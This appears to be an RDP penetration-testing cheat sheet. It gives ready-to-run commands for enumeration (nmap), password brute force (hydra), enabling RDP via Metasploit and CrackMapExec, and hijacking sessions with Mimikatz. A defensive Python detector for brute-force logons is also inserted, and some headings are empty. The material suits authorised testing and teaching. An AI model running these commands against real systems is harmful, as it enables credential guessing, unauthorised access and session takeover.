
What is RDP, and how to enumerate it for privilege escalation

RDP stands for Remote Desktop Protocol. It is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user can interact with the remote computer as if they were physically present at its location.

Key features of RDP include:

  1. Remote Control: RDP allows a user to control the desktop of a remote computer. This includes the ability to use the mouse and keyboard to interact with the remote system.
  2. Graphics Rendering: RDP is designed to transmit graphical user interface (GUI) data between the local and remote computers. This enables the remote desktop to display the same visual elements as the local desktop.
  3. File and Resource Sharing: Users can transfer files between the local and remote computers during an RDP session. Additionally, resources such as printers and clipboard content can be shared between the two systems.
  4. Encryption: RDP sessions can be configured to use encryption to secure the data transmitted between the local and remote computers, providing a secure means of communication.

RDP is commonly used for remote administration of computers and for accessing virtual desktops. It is widely used in business environments for IT support, software development, and other tasks that require remote access to computers.

There are different versions of the RDP protocol, and Microsoft regularly updates it to enhance security and add new features. Other remote desktop solutions also exist, but RDP is particularly associated with Microsoft Windows operating systems.

Enumerating RDP

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" 192.168.1.131 -p3389

Brute Force RDP

hydra -L userslist.txt -P wordlist.txt 192.168.1.131 rdp
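The defensive counterpart to the brute-force step above, added here as an example and not part of the original post: a detector over constructed Windows Security events (4625 failed logon and 4624 successful logon, logon type 10 = RemoteInteractive, i.e. RDP) that flags a burst of failed RDP logons from one source and records any successful RDP logon from that source afterwards. Event fields, timestamps, usernames and addresses are all constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security events (not real logs): 4625 = failed logon,
# 4624 = successful logon; logon_type 10 = RemoteInteractive (RDP). Only the EventData
# fields the detection needs are kept.
SAMPLE_EVENTS = [
    {"time": "2024-01-10T09:00:01", "id": 4625, "logon_type": 10, "user": "administrator", "src": "192.168.1.50"},
    {"time": "2024-01-10T09:00:02", "id": 4625, "logon_type": 10, "user": "rfs", "src": "192.168.1.50"},
    {"time": "2024-01-10T09:00:03", "id": 4625, "logon_type": 10, "user": "backup", "src": "192.168.1.50"},
    {"time": "2024-01-10T09:00:04", "id": 4625, "logon_type": 10, "user": "svc_sql", "src": "192.168.1.50"},
    {"time": "2024-01-10T09:00:05", "id": 4625, "logon_type": 10, "user": "helpdesk", "src": "192.168.1.50"},
    {"time": "2024-01-10T09:00:06", "id": 4624, "logon_type": 10, "user": "rfs", "src": "192.168.1.50"},
    {"time": "2024-01-10T09:05:00", "id": 4625, "logon_type": 10, "user": "alice", "src": "10.0.0.7"},
    {"time": "2024-01-10T09:05:30", "id": 4624, "logon_type": 10, "user": "alice", "src": "10.0.0.7"},
    {"time": "2024-01-10T09:07:00", "id": 4625, "logon_type": 3, "user": "bob", "src": "10.0.0.8"},
]

def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=2)):
    """Flag sources with >= threshold failed RDP logons inside a sliding time window.
    Each finding lists the usernames tried and any successful RDP logon from the same
    source after the burst, the trace a wordlist attack leaves when it finds a valid pair."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ev in events:
        if ev["logon_type"] != 10:
            continue  # only RemoteInteractive (RDP) logons are relevant here
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4625:
            failures[ev["src"]].append((ts, ev["user"]))
        elif ev["id"] == 4624:
            successes[ev["src"]].append((ts, ev["user"]))
    findings = []
    for src, fails in failures.items():
        fails.sort()
        start = 0  # left edge of the sliding window over sorted failure times
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_end = fails[end][0]
                users = sorted({u for _, u in fails[start:end + 1]})
                later_success = [u for ts, u in successes.get(src, []) if ts >= burst_end]
                findings.append({"src": src, "failures": end - start + 1,
                                 "users": users, "success_after": later_success})
                break  # one finding per source is enough to raise an alert
    return findings
```

With Network Level Authentication enabled, failed RDP attempts are commonly recorded as 4625 with logon type 3 rather than 10, so a production rule should match both types.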

Post Exploitation

Metasploit

use post/windows/manage/enable_rdp
set username rfs
set password Password123!
set session 1
exploit

CrackMapExec

crackmapexec smb '' -u '' -p '' -M rdp -o ACTION=enable

Connecting to RDP

xfreerdp /v:'' /u:'' /p:''
xfreerdp /v:'' /u:'' /p:'' +clipboard

# Maps the specified folder on the attacking machine into the RDP session as a shared drive
xfreerdp /v:'' /u:'' /p:'' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

Persistence

Credential Dumping

RDP Session Hijacking

Invoke-Mimikatz -Command '"ts::sessions"'
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'

Socks5 over RDP

https://github.com/nccgroup/SocksOverRDP

RDP Exploits

Bluekeep
